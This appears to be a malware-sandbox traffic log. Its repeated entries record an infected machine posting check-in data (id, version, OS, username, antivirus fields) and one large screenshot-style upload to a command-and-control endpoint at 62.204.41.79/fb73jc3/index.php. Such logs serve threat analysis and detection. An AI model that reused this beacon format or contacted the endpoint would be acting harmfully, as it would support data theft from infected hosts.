                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1ODE2Host: 62.204.41.79Content-Length: 105968Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
